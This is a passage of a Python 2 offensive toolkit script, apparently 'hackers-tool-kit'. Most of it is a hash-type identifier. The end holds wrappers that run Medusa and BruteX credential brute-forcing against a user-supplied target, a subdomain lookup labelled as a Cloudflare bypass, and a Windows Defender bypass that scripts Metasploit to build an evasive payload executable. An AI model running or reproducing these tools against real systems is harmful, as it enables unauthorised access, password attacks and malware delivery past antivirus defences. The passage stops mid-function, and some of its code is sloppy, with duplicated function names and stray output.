hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + 